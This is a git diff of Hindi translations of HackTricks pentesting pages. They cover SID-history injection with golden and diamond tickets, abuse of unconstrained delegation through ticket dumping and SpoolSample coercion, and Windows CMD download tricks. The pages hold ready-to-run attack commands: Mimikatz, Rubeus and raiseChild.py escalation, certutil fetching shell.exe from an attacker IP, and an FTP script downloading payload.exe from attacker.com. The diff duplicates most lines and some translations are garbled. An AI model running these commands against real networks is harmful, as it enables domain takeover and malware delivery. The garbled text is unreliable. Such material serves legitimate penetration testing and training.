* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>
## हमला
SID इतिहास को प्रबंधित करने के लिए बनाया गया था, जहां एक उपयोगकर्ता को एक डोमेन से दूसरे में ले जाया जाता है। "पुराने" डोमेन में संसाधनों तक पहुंच को सुरक्षित रखने के लिए, उपयोगकर्ता के **पिछले SID को उनके नए खाते के SID इतिहास में जोड़ा जाता है**। इसलिए ऐसे टिकट बनाने पर, माता-पिता डोमेन में एक विशेषाधिकारी समूह (EAs, DAs, आदि) का SID जोड़ा जा सकता है जो **माता-पिता में सभी संसाधनों तक पहुंच प्रदान करेगा**।
SID इतिहास को प्राथमिकता दी गई थी ताकि एक उपयोगकर्ता को एक से दूसरे डोमेन में स्थानांतरित किया जा सके। "पुराने" डोमेन में संसाधनों तक पहुंच को संरक्षित रखने के लिए **उपयोगकर्ता के पिछले SID को उनके नए खाते के SID इतिहास में जोड़ा जाता था**। इसलिए ऐसे टिकट बनाते समय, मात्रिक डोमेन में किसी भी विशेषाधिकारी समूह (ईएए, डीए, आदि) का SID जोड़ा जा सकता है जो **मातृ डोमेन में सभी संसाधनों तक पहुंच प्रदान करेगा**।
इसे आप एक [**Golden**](sid-history-injection.md#golden-ticket) या [**Diamond Ticket**](sid-history-injection.md#diamond-ticket) का उपयोग करके प्राप्त कर सकते हैं
इसे या तो [**Golden**](sid-history-injection.md#golden-ticket) या [**Diamond Ticket**](sid-history-injection.md#diamond-ticket) का उपयोग करके प्राप्त किया जा सकता है
**"एंटरप्राइज एडमिन्स"** समूह के **SID**ा पता लगाने के लिए आप **रूट डोमेन** के **SID** का पता लगा सकते हैं और इसे `S-1-5-21-<रूट डोमेन>-519` में सेट कर सकते हैं। उदाहरण के लिए, रूट डोमेन SID `S-1-5-21-280534878-1496970234-700767426` से **"एंटरप्राइज एडमिन्स"** समूह SID `S-1-5-21-280534878-1496970234-700767426-519` है।
**"एंटरप्राइज एडमिन्स"** समूह के **SID**ो खोजने के लिए आप **मूल डोमेन** का **SID** खोज सकते हैं और इसे `S-1-5-21-<मूल डोमेन>-519` में सेट कर सकते हैं। उदाहरण के लिए, मूल डोमेन SID `S-1-5-21-280534878-1496970234-700767426` समूह **"एंटरप्राइज एडमिन्स"** का SID है `S-1-5-21-280534878-1496970234-700767426-519`
आप यहां **डोमेन एडमिन्स** समूह का भी उपयोग कर सकते हैं, जो **512** से समाप्त होता है।
आप **Domain Admins** समूह का भी उपयोग कर सकते हैं, जो **512** में समाप्त होता है।
दूसरे डोमेन के समूह (उदाहरण के लिए "डोमेन एडमिन्स") के SID का पता लगाने का एक और तरीका है:
दूसरे डोमेन के समूह का **SID** खोजने का एक और तरीका (उदाहरण के लिए "Domain Admins") यह है:
```powershell
Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
```
@ -53,7 +53,7 @@ mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid
[golden-ticket.md](golden-ticket.md)
{% endcontent-ref %}
### डायमंड टिकट (Rubeus + KRBTGT-AES256)
### डायमंड टिकट (रुबेस + KRBTGT-AES256)
{% code overflow="wrap" %}
```powershell
@ -67,7 +67,7 @@ Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_s
```
{% endcode %}
डायमंड टिकट के बारे में अधिक जानकारी के लिए देखें:
डायमंड टिकट्स के बारे में अधिक जानकारी के लिए देखें:
{% content-ref url="diamond-ticket.md" %}
[diamond-ticket.md](diamond-ticket.md)
@ -81,7 +81,7 @@ ls \\mcorp-dc.moneycorp.local\c$
```
{% endcode %}
संकटित डोमेन के KRBTGT हैश का उपयोग करके रूट या एंटरप्राइज एडमिनिस्ट्रेटर तक उन्नत करें:
अपने द्वितीयक या रूट या कंप्रोमाइज़्ड डोमेन के KRBTGT हैश का उपयोग करके डीए या एंटरप्राइज़ व्यवस्थापक तक उन्नति करें:
{% code overflow="wrap" %}
```bash
@ -97,7 +97,7 @@ schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
```
{% endcode %}
अटैक से प्राप्त अनुमतियों के साथ आप नए डोमेन में उदाहरण के लिए एक DCSync हमला कर सकते हैं:
हमले से प्राप्त अनुमतियों के साथ आप नए डोमेन में उदाहरण के रूप में DCSync हमला कर सकते हैं:
{% content-ref url="dcsync.md" %}
[dcsync.md](dcsync.md)
@ -105,9 +105,7 @@ schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
### लिनक्स से
#### [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) के साथ मैनुअल
{% code overflow="wrap" %}
#### [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) के साथ मैन्युअल
```bash
# This is for an attack from child to root domain
# Get child domain SID
@ -129,21 +127,21 @@ psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.1
```
{% endcode %}
#### स्वचालित रूप से [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py) का उपयोग करें
#### स्वचालित रूप से [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py) का उपयोग
यह एक Impacket स्क्रिप्ट है जो **बालक से माता-पिता डोमेन में उन्नति को स्वचालित करेगा**। स्क्रिप्ट को निम्नलिखित चीजों की आवश्यकता होती है:
यह एक Impacket स्क्रिप्ट है जो **बच्चे से माता-पिता डोमेन में उन्नति को स्वचालित करेगा**। स्क्रिप्ट को आवश्यकता है:
* लक्षित डोमेन कंट्रोलर
* बालक डोमेन में एक व्यवस्थापक उपयोगकर्ता के लिए Creds
* लक्ष्य डोमेन कंट्रोलर
* बच्चे डोमेन में एडमिन उपयोगकर्ता के लिए Creds
प्रवाह है:
फ्लो इस प्रकार है:
* माता-पिता डोमेन के Enterprise Admins समूह के लिए SID प्राप्त करता है
* बालक डोमेन में KRBTGT खाते के लिए हैश प्राप्त करता है
* माता-पिता डोमेन के एंटरप्राइज एडमिन्स समूह के लिए SID प्राप्त करता है
* बच्चे डोमेन में KRBTGT खाते के लिए हैश पुनः प्राप्त करता है
* एक Golden Ticket बनाता है
* माता-पिता डोमेन में लॉगन करता है
* माता-पिता डोमेन में Administrator खाते के लिए प्रमाणपत्र प्राप्त करता है
* यदि `target-exec` स्विच निर्दिष्ट किया जाता है, तो यह पिता डोमेन के डोमेन कंट्रोलर के माध्यम से Psexec के माध्यम से प्रमाणित करता है।
* माता-पिता डोमेन में लॉगिन करता है
* माता-पिता डोमेन में व्यवस्थापक खाते के लिए क्रेडेंशियल पुनः प्राप्त करता है
* यदि `target-exec` स्विच निर्दिष्ट किया गया है, तो यह माता-पिता डोमेन के डोमेन कंट्रोलर के माध्यम से Psexec के माध्यम से प्रमाणीकृत होता है।
```bash
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
```
@ -155,10 +153,10 @@ raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह!
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>

View file

@ -1,73 +1,61 @@
# असंविधानिक डिलीगेशन
# असीमित डिलीगेशन
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें**।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन हैकट्रिक्स में** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस** चाहिए? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**दी पीएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) **डिस्कॉर्ड समूह** में](https://discord.gg/hRep4RUj7f) या **टेलीग्राम समूह** में शामिल हों](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**.
</details>
## असंविधानिक डिलीगेशन
## असीमित डिलीगेशन
यह एक सुविधा है जिसे डोमेन प्रशासक किसी भी **कंप्यूटर** में सेट कर सकता है। फिर, जब भी एक **उपयोगकर्ता लॉगिन** करता है कंप्यूटर पर, उस उपयोगकर्ता के **TGT की एक प्रतिलिपि** DC द्वारा प्रदान किए गए TGS में **भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी**। इसलिए, यदि आपके पास मशीन पर प्रशासक विशेषाधिकार हैं, तो आप किसी भी मशीन पर टिकट्स को **डंप कर सकेंगे और उपयोगकर्ताओं का अनुकरण कर सकेंगे**
यह एक सुविधा है जो डोमेन प्रशासक किसी **कंप्यूटर** पर सेट कर सकता है। फिर, जब भी कोई **उपयोगकर्ता कंप्यूटर पर लॉगिन करता है**, तो उस उपयोगकर्ता का **एक प्रतिलिपि TGT** DC द्वारा प्रदान किए गए TGS में **भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी**। इसलिए, अगर आपके पास मशीन पर प्रशासक विशेषाधिकार हैं, तो आप **टिकट को डंप करके उपयोगकर्ताओं का अनुकरण** कर सकेंगे।
तो यदि डोमेन व्यवस्थापक "असंविधानिक डिलीगेशन" सुविधा सक्रिय करके किसी कंप्यूटर में लॉगिन करता है, और आपके पास उस मशीन में स्थानीय प्रशासक विशेषाधिकार हैं, तो आप कहीं भी टिकट को डंप कर सकेंगे और डोमेन व्यवस्थापक का अनुकरण कर सकेंगे (डोमेन प्राइवेसी).
तो यदि डोमेन प्रशासक "असीमित डिलीगेशन" सुविधा सक्रिय करके किसी कंप्यूटर में लॉगिन करता है, और आपके पास उस मशीन में स्थानीय प्रशासक विशेषाधिकार हैं, तो आप टिकट को डंप करके कहीं भी डोमेन प्रशासक का अनुकरण कर सकेंगे (डोमेन प्राइवेस्क)।
आप इस गुण के साथ **कंप्यूटर ऑब्जेक्ट्स ढूंढ सकते हैं** जांचकर कि क्या [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) गुण [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) को समावेश करता है। आप इसे एक LDAP फ़िल्टर के साथ कर सकते हैं ' (userAccountControl:1.2.840.113556.1.4.803:=524288) ', जो powerview करता है:
आप **इस गुणवत्ता वाले कंप्यूटर ऑब्जेक्ट्स को खोज सकते हैं** जांच करके कि [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) विशेषता [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) शामिल है। आप इसे एलडीएपी फ़िल्टर के साथ कर सकते हैं (userAccountControl:1.2.840.113556.1.4.803:=524288), जो पावरव्यू करता है:
<pre class="language-bash"><code class="lang-bash"># असंविधानिक कंप्यूटरों की सूची
## Powerview
Get-NetComputer -Unconstrained #DCs हमेशा दिखाई देते हैं लेकिन privesc के लिए उपयोगी नहीं होते हैं
<pre class="language-bash"><code class="lang-bash"># असीमित कंप्यूटरों की सूची
## पावरव्यू
Get-NetComputer -Unconstrained #DCs हमेशा दिखाई देते हैं लेकिन प्राइवेस्क के लिए उपयोगी नहीं हैं
<strong>## ADSearch
</strong>ADSearch.exe --search "(&#x26;(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
<strong># Mimikatz के साथ टिकट निर्यात करें
</strong>privilege::debug
sekurlsa::tickets /export #सिफारिश की जाती है
sekurlsa::tickets /export #सिफारिश की गई तरीका
kerberos::list /export #एक और तरीका
# लॉगिन की निगरानी करें और नए टिकट निर्यात करें
.\Rubeus.exe monitor /targetuser:&#x3C;username> /interval:10 #नए TGT के लिए हर 10 सेकंड में जांचें</code></pre>
.\Rubeus.exe monitor /targetuser:&#x3C;username> /interval:10 #10 सेकंड में नए TGTs के लिए हर 10 सेकंड जांचें</code></pre>
**Mimikatz** या **Rubeus** के साथ व्यवस्थापक (या पीड़ित उपयोगकर्ता) का टिकट मेमोरी में लोड करें एक [**पास द टिकट**](pass-the-ticket.md)** के लिए**।\
**Mimikatz** या **Rubeus** के साथ प्रशासक (या पीडित उपयोगकर्ता) का टिकट मेमोरी में लोड करें और [**पास द टिकट**](pass-the-ticket.md) के लिए।\
अधिक जानकारी: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
[**ired.team में असंविधानिक डिलीगेशन के बारे में अधिक जानकारी।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
[**असीमित डिलीगेशन के बारे में अधिक जानकारी ired.team में।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
### **प्रमाणीकरण को बलवान बनाएं**
### **बल प्रमाणीकरण**
यदि एक हमलावर किसी कंप्यूटर को "असंविधानिक डिलीगेशन" के लिए अनुमति देने के लिए सक्षम है, तो वह एक **प्रिंट सर्वर** को **स्वचालित रूप से लॉगिन** करने के लिए धोखा दे सकता है और सर्वर की मेमोरी में एक TGT को सहेज सकता है।\
फिर, हमलावर उपयोगकर्ता प्रिंट सर्वर कंप्यूटर खाते का अनुकरण करने के लिए एक **पास द टिकट हमला** कर सकता है।
यदि एक हमलावर किसी कंप्यूटर को **"असीमित डिलीगेशन" के लिए अनुमति देने में सक्षम है**, तो वह एक **प्रिंट सर्वर** को **धोखा दे सकता है** कि वह इसके खिलाफ स्वचालित रूप से लॉगिन करेगा और सर्वर की मेमोरी में एक TGT सहेजेगा।\
फिर, हमलावर उपयोगकर्ता प्रिंट सर्वर कंप्यूटर खाते का अनुकरण करने के लिए **पास द टिकट हमला** कर सकता है।
किसी भी मशीन के खिलाफ प्रिंट सर्वर को लॉगिन करने के लिए आप [**SpoolSample
किसी भी मशीन के खिलाफ प्रिंट सर्वर लॉगिन करने के लिए आप [**SpoolSample**](https://github.com/leechristensen/SpoolSample) का उपयोग कर सकते हैं:
```bash
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
```
यदि TGT एक डोमेन कंट्रोलर से है, तो आप एक [**DCSync हमला**](acl-persistence-abuse/#dcsync) कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं।\
यदि TGT एक डोमेन कंट्रोलर से है, तो आप एक **DCSync हमला** कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं।\
[**इस हमले के बारे में अधिक जानकारी ired.team में।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
**यहां अन्य तरीके हैं जिनका उपयोग करके प्रमाणीकरण को बलवान बनाने की कोशिश की जा सकती है:**
**यहाँ अन्य तरीके हैं जिनका प्रयास करके प्रमाणीकरण को मजबूर करने के लिए:**
{% content-ref url="printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](printers-spooler-service-abuse.md)
{% endcontent-ref %}
### रोकथाम
### संरोधन
* विशेष सेवाओं के लिए सीमित डीए/व्यवस्थापक लॉगिन करें
* उच्चाधिकारी खातों के लिए "खाता संवेदनशील है और इसे अधिग्रहण नहीं किया जा सकता" सेट करें।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।**
</details>
* DA/Admin लॉगिन को विशेष सेवाओं पर सीमित करें
* विशेषाधिकारी खातों के लिए "खाता संवेदनशील है और यह अनुमति नहीं दी जा सकती" सेट करें।

View file

@ -1,14 +1,14 @@
# बुनियादी विन्डोज़ CMD पेंटेस्टर्स के लिए
# बेसिक विंडोज CMD पेंटेस्टर्स के लिए
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** [**hacktricks**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को पीआर जमा करके**।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**।
</details>
@ -32,14 +32,14 @@ DRIVERQUERY #3rd party driver vulnerable?
```bash
set #List all environment variables
```
कुछ env variables को हाइलाइट करने के लिए:
कुछ env variables को हाइलाइट करें:
* **COMPUTERNAME**: कंप्यूटर का नाम
* **TEMP/TMP:** टेम्प फ़ोल्डर
* **USERNAME:** आपका उपयोगकर्ता नाम
* **HOMEPATH/USERPROFILE:** होम डायरेक्टरी
* **windir:** C:\Windows
* **OS**: Windows ऑपरेटिंग सिस्टम
* **OS**: विंडोज ओएस
* **LOGONSERVER**: डोमेन कंट्रोलर का नाम
* **USERDNSDOMAIN**: DNS के साथ उपयोग करने के लिए डोमेन का नाम
* **USERDOMAIN**: डोमेन का नाम
@ -53,7 +53,7 @@ wmic logicaldisk get caption,description,providername
```
### [रक्षक](authentication-credentials-uac-and-efs.md#defender)
### कचरा बिन
### पुनर्चक्रव्यूह
```bash
dir C:\$Recycle.Bin /s /b
```
@ -272,17 +272,19 @@ Bitsadmin.exe
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
```
```html
<p>CertReq.exe</p>
<h2>कर्टरेक्वेस्ट.exe</h2>
```
```
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```
Certutil.exe
कर्न्टिल.एक्से
```
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
```
```plaintext
डेस्कटॉपइमेजडाउनलोडर.exe
डेस्कटॉपimgdownldr.exe
```
```
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
@ -315,31 +317,32 @@ extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Findstr.exe
```
फाइंडस्ट्र.एक्सएएनएम्
```html
Findstr.exe
```
```
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
```
```plaintext
Ftp.exe
```
FTP.exe
```
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
```
```html
```plaintext
GfxDownloadWrapper.exe
```
```
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
```
Hh.exe
```html
<h2>हेडर हंटर (Header Hunter)</h2>
```
```
HH.exe http://some.url/script.ps1
```
```plaintext
Ieexec.exe
```
```
ieexec.exe http://x.x.x.x:8080/bypass.exe
```
```html
@ -354,30 +357,11 @@ MpCmdRun.exe
```
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
```
```plaintext
**Replace.exe**
**विवरण**
